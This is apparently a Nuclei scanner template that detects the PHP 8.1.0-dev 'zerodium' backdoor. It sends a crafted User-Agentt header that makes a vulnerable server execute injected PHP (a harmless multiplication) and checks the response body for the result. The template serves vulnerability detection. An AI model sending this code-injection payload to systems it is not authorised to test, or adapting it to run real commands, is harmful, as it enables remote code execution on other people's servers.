nuclei-templates/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml

34 lines
925 B
YAML

id: php-zerodium-backdoor-rce
info:
name: PHP 8.1.0-dev - Backdoor Remote Code Execution
author: dhiyaneshDk
severity: critical
description: |
PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.
reference:
- https://news-web.php.net/php.internals/113838
- https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
- https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: php,backdoor,rce,zerodium
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agentt: zerodiumvar_dump(233333*333332);
matchers-condition: and
matchers:
- type: word
part: body
words:
- "int(77777355556)"